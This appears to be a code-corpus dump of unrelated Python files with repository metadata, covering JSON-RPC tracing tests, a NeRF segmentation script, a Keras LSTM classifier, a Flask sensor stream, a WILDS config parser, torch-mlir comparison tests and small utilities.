def test_request_tracing(mocker, req, resp, exc):
class Client(client.AbstractClient):
def _request(self, request_text, is_notification=False, **kwargs):
if exc:
raise exc
return json.dumps(resp.to_json())
class Tracer(client.Tracer):
on_request_begin = mocker.Mock('on_request_begin')
on_request_end = mocker.Mock('on_request_end')
on_error = mocker.Mock('on_error')
tracer = Tracer()
cli = Client(tracers=(tracer,))
trace_ctx = object()
if exc:
with pytest.raises(BaseException):
cli.send(req, _trace_ctx=trace_ctx)
tracer.on_error.assert_called_once_with(trace_ctx, req, exc)
else:
if isinstance(req, BatchRequest):
cli.batch.send(req, _trace_ctx=trace_ctx)
else:
cli.send(req, _trace_ctx=trace_ctx)
tracer.on_request_begin.assert_called_once_with(trace_ctx, req)
tracer.on_request_end.assert_called_once_with(trace_ctx, req, resp)
@pytest.mark.parametrize(
'req, resp, exc', [
(
Request(id=1, method='method', params=[1, '2']),
Response(id=1, result='result'),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
BatchResponse(Response(id=1, result='result')),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
None,
BaseException(),
),
],
)
async def test_async_request_tracing(mocker, req, resp, exc):
class Client(client.AbstractAsyncClient):
async def _request(self, request_text, is_notification=False, **kwargs):
if exc:
raise exc
return json.dumps(resp.to_json())
class Tracer(client.Tracer):
on_request_begin = mocker.Mock('on_request_begin')
on_request_end = mocker.Mock('on_request_end')
on_error = mocker.Mock('on_error')
tracer = Tracer()
cli = Client(tracers=(tracer,))
trace_ctx = object()
if exc:
with pytest.raises(BaseException):
await cli.send(req, _trace_ctx=trace_ctx)
tracer.on_error.assert_called_once_with(trace_ctx, req, exc)
else:
if isinstance(req, BatchRequest):
await cli.batch.send(req, _trace_ctx=trace_ctx)
else:
await cli.send(req, _trace_ctx=trace_ctx)
tracer.on_request_begin.assert_called_once_with(trace_ctx, req)
tracer.on_request_end.assert_called_once_with(trace_ctx, req, resp)
| 2.140625
| 2
|
access_audit/middleware.py
|
cforlando/intake
| 51
|
12784782
|
from intake.middleware import MiddlewareBase
from easyaudit.middleware.easyaudit import clear_request
class ClearRequestMiddleware(MiddlewareBase):
    def process_response(self, response):
        clear_request()
        return response
| 1.6875
| 2
|
object_segmentation.py
|
lyclyc52/nerf_with_slot_attention
| 1
|
12784783
|
from object_segmentation_helper import *
os.environ['CUDA_VISIBLE_DEVICES'] = '2,3'
base_dir = '/data/yliugu/ONeRF/results/testing_clevrtex_animal2'
datadir = '/data/yliugu/ONeRF/data/nerf_synthetic/clevrtex_animal2'
input_size = 400
images, poses, depth_maps, render_poses, hwf, i_split = load_data(
datadir, size = input_size)
first_cluster_dir = os.path.join(base_dir, 'first_cluster')
os.makedirs(first_cluster_dir, exist_ok=True)
mask_refine_dir = os.path.join(base_dir, 'mask_refine')
os.makedirs(mask_refine_dir, exist_ok=True)
segmentation_dir = os.path.join(base_dir, 'segmentation')
os.makedirs(segmentation_dir, exist_ok=True)
N_imgs =100
images, depth_maps, poses = images[:N_imgs, :, :, :3], depth_maps[:N_imgs], poses[:N_imgs]
device = torch.device("cuda:0" )
# image = [0, 2, 3, 5, 22, 23, 24, 25, 39, 40, 41, 42, 43, 45, 46, 48]
# val = [0, 3, 25, 39]
# val = [t for t in range(iter*2,iter*2+4)]
# val = [0, 2, 3, 5, 22, 23, 24, 25, 39, 40, 41, 42, 43, 45, 46, 48] #for simple clevr
val = [2,3,7,8,9,12, 15,16, 22,23,24, 27,28,31, 32,35, 37, 38, 40,43, 46,47, 48,51,52] #for clevrtex
# val = [8,9,26,27,31,32,33,34,38,39,40,45,46,47,52,53,57,58,59,60]
# val = [ 4, 5, 6, 23, 24, 30, 33, 40, 41, 42, 43, 45, 46, 48, 58] #for clevrtex
# val = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
# val = [0,1,2, 9,10,11,12,13,14,16,17,24,25,27,28]
print(val)
val_images, val_depths, val_poses = images[val], depth_maps[val], poses[val]
cluster_size = 100
cluster_images = tf.compat.v1.image.resize(val_images, [cluster_size, cluster_size], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR).numpy()
cluster_depth = tf.compat.v1.image.resize(val_depths[...,None], [cluster_size, cluster_size], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR).numpy()
cluster_depth = cluster_depth[...,0]
cluster_images, cluster_depth, val_poses = torch.from_numpy(cluster_images), torch.from_numpy(cluster_depth), torch.from_numpy(val_poses)
H,W,focal = hwf
_,H,W,_ = cluster_images.shape
hwf= [H,W,focal]
# val_images, val_depths, val_poses = val_images.to(device), val_depths.to(device), val_poses.to(device)
with torch.no_grad():
cluster_images, cluster_depth, val_poses = cluster_images.to(device), cluster_depth.to(device), val_poses.to(device)
f_extractor = Encoder_VGG(hwf, device=device)
f_extractor.to(device)
print(cluster_images.shape)
print(cluster_depth.shape)
print(val_poses.shape)
f = f_extractor(cluster_images, cluster_depth, val_poses)
B, H, W, C = f.shape
f = f.reshape([-1, C])
f_p = f[...,C-3:]
f = f[...,:C-3]
w = 10.
attn_logits = KM_clustering(f, f_p, w, device)
attn = attn_logits.softmax(dim=-1)
attn = attn.reshape([B,H,W,2])
attn = attn.permute([0,3,1,2])
attn = attn.cpu().numpy()
cluster_images = cluster_images.cpu().numpy()
# print(iter)
seg_inputs = []
for b in range(B):
for s in range(2):
imageio.imwrite(os.path.join(first_cluster_dir, 'val_{:06d}_slot{:01d}.jpg'.format(b,s)), to8b(attn[b][s]))
imageio.imwrite(os.path.join(first_cluster_dir, 'masked_{:06d}_slot{:01d}.jpg'.format(b,s)), to8b(attn[b][s][...,None]*cluster_images[b]))
im = to8b(attn[b][1])
dilation = ndimage.binary_dilation(im)
dilation = ndimage.binary_dilation(dilation, iterations=5)
# erode = ndimage.binary_erosion(dilation, iterations=1)
origin = images[val[b]]
erode = (dilation / 255.).astype(np.float32)
erode = tf.compat.v1.image.resize_area(erode[None, ..., None], [input_size, input_size]).numpy()
seg_input = to8b(erode[0, ...] * origin * 255.)
seg_inputs.append(torch.from_numpy(seg_input))
imageio.imsave(os.path.join(mask_refine_dir,'seg_input{:d}.png'.format(b)),seg_input)
imageio.imsave(os.path.join(mask_refine_dir,'mask{:d}.png').format(b), to8b(erode[0] * 255.))
# seg_inputs = torch.stack(seg_inputs)
# seg_inputs = seg_inputs/255.
# print(seg_inputs.shape)
# torch.cuda.empty_cache()
# imgs = []
# for i in range(15):
# fname = os.path.join(mask_refine_dir, 'seg_input{:01d}.png'.format(i))
# imgs.append(imageio.imread(fname))
# imgs = (np.array(imgs) / 255.).astype(np.float32) # keep all 4 channels (RGBA)
# imgs= imgs[...,:3]
# seg_inputs = torch.from_numpy(imgs)
# model, target_im = train(seg_inputs, base_dir)
# cluster = np.unique(im_target)
# target_im = target_im.cpu().numpy()
# final_masks = []
# for c in range(cluster.shape[0]):
# masks = (target_im==cluster[c])
# cluster_masks = []
# for b in range(B):
# im = mask[b]
# dilation = ndimage.binary_dilation(im, iterations= 1)
# erode = ndimage.binary_erosion(im, iterations= 4)
# cluster_masks.append(erode)
# cluster_masks = torch.stack(cluster_masks)
# final_masks.append(cluster_masks)
# final_masks = torch.stack(final_masks, dim=-1)
# init_bg_mask = attn[0][0]
# init_bg_mask = tf.compat.v1.image.resize_area(init_bg_mask[None, ..., None], [input_size, input_size]).numpy()
# init_bg_mask = init_bg_mask[0,...,0]
# inter_area = []
# for c in range(cluster.shape[0]):
# intersection = init_bg_mask*final_masks[0,...,c]
# inter_area.append(np.sum(intersection))
# max_value = max(inter_area)
# max_index = number_list.index(max_value)
# val_images = torch.from_numpy(val_images)
# val_images = val_images.to(device)
# output = model( val_images )
# inti_slot = val_images.shape[1]
# output = output.permute([0,2,3,1]).reshape( [-1, inti_slot] )
# cluster_index = []
# for c in range(cluster.shape[0]):
# cur_m = final_masks[..., c]
# cur_m = cur_m.reshape(-1)
# cluster_index.append(cur_m)
# for i in range(5):
# t = []
# print('sample')
# for j in range(cluster.shape[0]):
# size = cluster_index[j].shape[0]
# index = torch.randint(size, (size//10,))
# c_class = cluster.shape[0][j]
# c_class = c_class[index]
# t.append(c_class.mean(dim=0))
# for j in range(cluster.shape[0]):
# print(torch.norm(t[j]-t[max_index]))
| 1.96875
| 2
|
archive/nexus-api-v2/Database/Utilities/Discord/Enumerations/Channel.py
|
cloud-hybrid/delta
| 0
|
12784784
|
"""
...
"""
from . import *
class Type(Integer, Enumeration):
"""
...
"""
TEXT = 0x0
PRIVATE = 0x1
VOICE = 0x2
GROUP = 0x3
    CATEGORY = 0x4
NEWS = 0x5
STORE = 0x6
def __str__(self):
""" String Representation of Enumeration """
return self.name
__all__ = [
"Type"
]
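# A short usage sketch (illustrative only; assumes Enumeration is an enum.Enum subclass):
#   channel_type = Type.VOICE
#   print(channel_type.value, str(channel_type))   # 2 VOICE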
| 2.953125
| 3
|
LSTM.py
|
niyazed/violence-video-classification
| 9
|
12784785
|
<filename>LSTM.py
import numpy as np
import os
import cv2
import keras
import sklearn
import pandas
from time import time
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.utils import to_categorical
from keras.models import load_model
from keras.layers import *
from keras import layers
from keras import Model
from keras.callbacks import TensorBoard
from keras import optimizers
from keras import regularizers
import matplotlib.pyplot as plt
from keras.applications import *
from sklearn.metrics import classification_report
import time
input = np.load("resnet_features.npy")
print(input.shape)
X = np.reshape(input,(input.shape[0],input.shape[1],input.shape[2]*input.shape[3]))
print(X.shape)
y_violent = np.zeros(87)
y_non_violent = np.ones(88)
y = np.append(y_violent,y_non_violent)
print(y.shape)
X_train, X_test, y_train, y_test = train_test_split(X,y, random_state=42, test_size=0.2)
print(X_train.shape,X_test.shape,y_train.shape, y_test.shape)
model = Sequential()
model.add(CuDNNLSTM(50, input_shape=(X.shape[1],X.shape[2]), return_sequences=False, kernel_regularizer=regularizers.l2(0.01)))
model.add(Dense(1,activation='sigmoid'))
model.summary()
optimizer = optimizers.adam(lr=0.001,decay=0.004)
model.compile(loss="binary_crossentropy",optimizer=optimizer,metrics=["accuracy"])
start = time.time()
model.fit(X_train,y_train, epochs=20, verbose=1, validation_data=(X_test,y_test), batch_size=32)
end = time.time()
time = end - start
print("Time: ", time)
# model.save_weights("resnet_LSTM.h5")
# pred = model.predict(X_test)
# prediction = []
# for p in pred:
# if p>=.5:
# prediction.append(1)
# else:
# prediction.append(0)
# print(classification_report(prediction, y_test))
| 2.90625
| 3
|
sensores/server/application.py
|
luyisimiger/proyecto_sensores
| 0
|
12784786
|
"""server docstring"""
import json
import random
import time
from datetime import datetime
from flask import Flask, Response, render_template, redirect, url_for
from flask_mongoengine import MongoEngine
from sensores.db.models import Sensor, Medition
from sensores.db import util
from .businesslogic import get_sensors_data
from ..db.util import connect_redis
application = Flask(__name__)
application.config.from_object('sensores.server.config')
db = MongoEngine(application)
redis_client = connect_redis()
# register blueprint's
from .views import main as main_blueprint
from .sensors import sensor as sensor_blueprint
application.register_blueprint(main_blueprint)
application.register_blueprint(sensor_blueprint)
random.seed() # Initialize the random number generator
@application.route('/stream/sensors/data')
def stream():
def stream_sensors_data():
for s in Sensor.objects:
meditions = []
for m in Medition.objects(sensor=s.id):
meditions.append({
'fechahora': m.fechahora.strftime('%Y-%m-%d %H:%M:%S'),
'value': m.value
})
json_data = json.dumps({
'sensor': {
'type': s.type,
'name': s.name,
'meditions': meditions
}
})
yield f"data: {json_data}\n\n"
time.sleep(0.6)
return Response(stream_sensors_data(), mimetype='text/event-stream')
if __name__ == '__main__':
util.conectdb()
application.run(debug=True, threaded=True)
| 2.203125
| 2
|
tknb/queue_message.py
|
TimonLukas/tknb
| 0
|
12784787
|
from enum import Enum
from typing import Tuple, Any
class MessageType(Enum):
METHOD_CALL = 0
CUSTOM_EVENT = 1
QueueMessage = Tuple[MessageType, str, Any]
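# A minimal usage sketch (the method name and payload are illustrative):
#   message: QueueMessage = (MessageType.METHOD_CALL, "notebook.run_cell", {"cell_id": 3})
#   kind, name, payload = message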
| 2.90625
| 3
|
Montecarlo_.py
|
boodahDEV/Python_shoes
| 0
|
12784788
|
import matplotlib.pyplot as plt
plt.rcParams['toolbar'] = 'None'
import numpy as np  # importing numpy
def genera_montecarlo(N=100000):
plt.figure(figsize=(6,6))
x, y = np.random.uniform(-1, 1, size=(2, N))
interior = (x**2 + y**2) <= 1
pi = interior.sum() * 4 / N
error = abs((pi - np.pi) / pi) * 100
exterior = np.invert(interior)
plt.plot(x[interior], y[interior], 'b.')
plt.plot(x[exterior], y[exterior], 'r.')
plt.plot(0, 0, label='$\hat \pi$ = {:4.4f} \nerror = {:4.4f}%'.format(pi,error), alpha=0, color='g')
plt.axis('square')
plt.legend(frameon=True, framealpha=0.9, fontsize=16)
plt.show()
genera_montecarlo()
| 2.9375
| 3
|
alien.py
|
cmotek/python_crashcourse
| 0
|
12784789
|
<reponame>cmotek/python_crashcourse
alien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}
print(f"Original position: {alien_0['x_position']}")
if alien_0['speed'] == 'slow':
x_increment = 1
elif alien_0['speed'] == 'medium':
x_increment = 2
else:
x_increment = 3
alien_0['x_position'] = alien_0['x_position'] + x_increment
print(f"New position: {alien_0['x_position']}")
alien_0 = {'color': 'green', 'points': 5}
print(alien_0)
del alien_0['points']
print(alien_0)
| 2.921875
| 3
|
notebooks/utils.py
|
yangarbiter/wilds
| 0
|
12784790
|
import sys
sys.path.append("../")
sys.path.append("../examples/")
import argparse
from configs import supported
from configs.utils import populate_defaults
import wilds
# Taken from https://sumit-ghosh.com/articles/parsing-dictionary-key-value-pairs-kwargs-argparse-python/
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, dict())
for value in values:
key, value_str = value.split('=')
if value_str.replace('-','').isnumeric():
processed_val = int(value_str)
elif value_str.replace('-','').replace('.','').isnumeric():
processed_val = float(value_str)
elif value_str in ['True', 'true']:
processed_val = True
elif value_str in ['False', 'false']:
processed_val = False
else:
processed_val = value_str
getattr(namespace, self.dest)[key] = processed_val
def parse_bool(v):
if v.lower()=='true':
return True
elif v.lower()=='false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
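# A short illustration of how ParseKwargs behaves (the flag name and values are examples only,
# built on a throwaway parser rather than the one returned by get_config):
#   demo_parser = argparse.ArgumentParser()
#   demo_parser.add_argument('--model_kwargs', nargs='*', action=ParseKwargs, default={})
#   demo_args = demo_parser.parse_args(['--model_kwargs', 'dropout=0.1', 'pretrained=True'])
#   # demo_args.model_kwargs == {'dropout': 0.1, 'pretrained': True}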
def get_config(dataset, algorithm, root_dir):
parser = argparse.ArgumentParser()
# Required arguments
parser.add_argument('-d', '--dataset', choices=wilds.supported_datasets, required=True)
parser.add_argument('--algorithm', required=True, choices=supported.algorithms)
parser.add_argument('--root_dir', required=True,
help='The directory where [dataset]/data can be found (or should be downloaded to, if it does not exist).')
parser.add_argument('--enable_privacy', default=False, action='store_true')
# Dataset
parser.add_argument('--split_scheme', help='Identifies how the train/val/test split is constructed. Choices are dataset-specific.')
parser.add_argument('--dataset_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--download', default=False, type=parse_bool, const=True, nargs='?',
help='If true, tries to downloads the dataset if it does not exist in root_dir.')
parser.add_argument('--subsample', default=False, type=parse_bool, const=True, nargs='?',
help='If true, subsample every group to the minimum group size.')
parser.add_argument('--frac', type=float, default=1.0,
help='Convenience parameter that scales all dataset splits down to the specified fraction, for development purposes. Note that this also scales the test set down, so the reported numbers are not comparable with the full test set.')
parser.add_argument('--version', default=None, type=str)
# Loaders
parser.add_argument('--loader_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--train_loader', choices=['standard', 'group'])
parser.add_argument('--uniform_over_groups', type=parse_bool, const=True, nargs='?')
parser.add_argument('--distinct_groups', type=parse_bool, const=True, nargs='?')
parser.add_argument('--n_groups_per_batch', type=int)
parser.add_argument('--batch_size', type=int)
parser.add_argument('--eval_loader', choices=['standard'], default='standard')
parser.add_argument('--weighted_uniform_iid', type=parse_bool, const=True, nargs='?')
parser.add_argument('--uniform_iid', type=parse_bool, const=True, nargs='?')
parser.add_argument("--sample_rate", type=float, default=0.001, metavar="SR",
help="sample rate used for batch construction (default: 0.001)",)
# Model
parser.add_argument('--model', choices=supported.models)
parser.add_argument('--model_kwargs', nargs='*', action=ParseKwargs, default={},
help='keyword arguments for model initialization passed as key1=value1 key2=value2')
# Transforms
parser.add_argument('--transform', choices=supported.transforms)
parser.add_argument('--target_resolution', nargs='+', type=int, help='The input resolution that images will be resized to before being passed into the model. For example, use --target_resolution 224 224 for a standard ResNet.')
parser.add_argument('--resize_scale', type=float)
parser.add_argument('--max_token_length', type=int)
# Objective
parser.add_argument('--loss_function', choices = supported.losses)
parser.add_argument('--loss_kwargs', nargs='*', action=ParseKwargs, default={},
help='keyword arguments for loss initialization passed as key1=value1 key2=value2')
# Algorithm
parser.add_argument('--groupby_fields', nargs='+')
parser.add_argument('--group_dro_step_size', type=float)
parser.add_argument('--coral_penalty_weight', type=float)
parser.add_argument('--irm_lambda', type=float)
parser.add_argument('--irm_penalty_anneal_iters', type=int)
parser.add_argument('--algo_log_metric')
# Model selection
parser.add_argument('--val_metric')
parser.add_argument('--val_metric_decreasing', type=parse_bool, const=True, nargs='?')
# Optimization
parser.add_argument('--n_epochs', type=int)
parser.add_argument('--optimizer', choices=supported.optimizers)
parser.add_argument('--lr', type=float)
parser.add_argument('--weight_decay', type=float)
parser.add_argument('--max_grad_norm', type=float)
parser.add_argument('--optimizer_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--sigma', type=float, default=1.0)
parser.add_argument('--max_per_sample_grad_norm', type=float, default=1.0)
parser.add_argument('--delta', type=float, default=1e-5)
# Scheduler
parser.add_argument('--scheduler', choices=supported.schedulers)
parser.add_argument('--scheduler_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--scheduler_metric_split', choices=['train', 'val'], default='val')
parser.add_argument('--scheduler_metric_name')
# Evaluation
parser.add_argument('--process_outputs_function', choices = supported.process_outputs_functions)
parser.add_argument('--evaluate_all_splits', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--eval_splits', nargs='+', default=[])
parser.add_argument('--eval_only', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--eval_epoch', default=None, type=int, help='If eval_only is set, then eval_epoch allows you to specify evaluating at a particular epoch. By default, it evaluates the best epoch by validation performance.')
# Misc
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--log_dir', default='./logs')
parser.add_argument('--log_every', default=50, type=int)
parser.add_argument('--save_step', type=int)
parser.add_argument('--save_best', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--save_last', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--save_pred', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--no_group_logging', type=parse_bool, const=True, nargs='?')
parser.add_argument('--use_wandb', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--progress_bar', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--resume', type=parse_bool, const=True, nargs='?', default=False)
config = parser.parse_args(["--dataset", dataset, "--algorithm", algorithm, "--root_dir", root_dir])
config = populate_defaults(config)
return config
| 2.609375
| 3
|
e2e_testing/torchscript/elementwise_comparison.py
|
pashu123/torch-mlir
| 0
|
12784791
|
<filename>e2e_testing/torchscript/elementwise_comparison.py
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
import torch
from torch_mlir_e2e_test.torchscript.framework import TestUtils
from torch_mlir_e2e_test.torchscript.registry import register_test_case
from torch_mlir_e2e_test.torchscript.annotations import annotate_args, export
# ==============================================================================
class ElementwiseGtFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.gt(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseGtFloatScalarModule())
def ElementwiseGtFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGtIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.gt(x, 10)
@register_test_case(module_factory=lambda: ElementwiseGtIntScalarModule())
def ElementwiseGtIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseGtMixed2ScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.gt(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGtMixed2ScalarModule())
def ElementwiseGtMixed2ScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseGeFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.ge(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseGeFloatScalarModule())
def ElementwiseGeFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGeIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.ge(x, 10)
@register_test_case(module_factory=lambda: ElementwiseGeIntScalarModule())
def ElementwiseGeIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseGeMixedIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.ge(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGeMixedIntScalarModule())
def ElementwiseGeMixedIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseGeFloatIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.ge(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGeFloatIntScalarModule())
def ElementwiseGeFloatIntScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGtFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.gt(x, y)
@register_test_case(module_factory=lambda: ElementwiseGtFloatTensorModule())
def ElementwiseGtFloatTensorModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5), tu.rand(5))
# ==============================================================================
class ElementwiseGtIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.gt(x, y)
@register_test_case(module_factory=lambda: ElementwiseGtIntTensorModule())
def ElementwiseGtIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(10, (3, 5)), torch.randint(10, (5, )))
# ==============================================================================
class ElementwiseLtFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.lt(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseLtFloatScalarModule())
def ElementwiseLtFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLtIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.lt(x, 0)
@register_test_case(module_factory=lambda: ElementwiseLtIntScalarModule())
def ElementwiseLtIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseLtDiffWidthScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.lt(x, 2)
@register_test_case(
module_factory=lambda: ElementwiseLtDiffWidthScalarModule())
def ElementwiseLtDiffWidthScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseLeFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.le(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseLeFloatScalarModule())
def ElementwiseLeFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLeIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.le(x, 10)
@register_test_case(module_factory=lambda: ElementwiseLeIntScalarModule())
def ElementwiseLeIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseLeMixedIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.le(x, 7)
@register_test_case(module_factory=lambda: ElementwiseLeMixedIntScalarModule())
def ElementwiseLeMixedIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseLeFloatIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.le(x, 7)
@register_test_case(module_factory=lambda: ElementwiseLeFloatIntScalarModule())
def ElementwiseLeFloatIntScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLtFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.lt(x, y)
@register_test_case(module_factory=lambda: ElementwiseLtFloatTensorModule())
def ElementwiseLtFloatTensorModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5), tu.rand(5))
# ==============================================================================
class ElementwiseLtIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.lt(x, y)
@register_test_case(module_factory=lambda: ElementwiseLtIntTensorModule())
def ElementwiseLtIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(10, (3, 5)), torch.randint(10, (5, )))
# ==============================================================================
class ElementwiseEqFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.eq(x, 6.0)
@register_test_case(module_factory=lambda: ElementwiseEqFloatScalarModule())
def ElementwiseEqFloatScalarModule_basic(module, tu: TestUtils):
module.forward(
torch.tensor([[1.0, 2.2, 6.0], [6.0, 2.0, 3.1]]).to(torch.float32))
# ==============================================================================
class ElementwiseEqIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.eq(x, 2)
@register_test_case(module_factory=lambda: ElementwiseEqIntScalarModule())
def ElementwiseEqIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (5, 8)))
# ==============================================================================
class ElementwiseEqDiffWidthScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.eq(x, 2)
@register_test_case(
module_factory=lambda: ElementwiseEqDiffWidthScalarModule())
def ElementwiseEqDiffWidthScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (5, 8)).to(torch.int32))
# ==============================================================================
class ElementwiseEqFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.eq(x, y)
@register_test_case(module_factory=lambda: ElementwiseEqFloatTensorModule())
def ElementwiseEqFloatTensorModule_basic(module, tu: TestUtils):
module.forward(
torch.tensor([[1.0, 2.2, 6.0], [6.0, 2.0, 3.1]]).to(torch.float32),
torch.tensor([1.0, 2.4, 6.0]).to(torch.float32))
# ==============================================================================
class ElementwiseEqIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.eq(x, y)
@register_test_case(module_factory=lambda: ElementwiseEqIntTensorModule())
def ElementwiseEqIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (8, 5)), torch.randint(2, 4, (5, )))
| 1.96875
| 2
|
gokart/utils.py
|
ujiuji1259/gokart
| 0
|
12784792
|
<reponame>ujiuji1259/gokart<gh_stars>0
import os
import luigi
def add_config(file_path: str):
_, ext = os.path.splitext(file_path)
luigi.configuration.core.parser = ext
assert luigi.configuration.add_config_path(file_path)
| 2.109375
| 2
|
layers.py
|
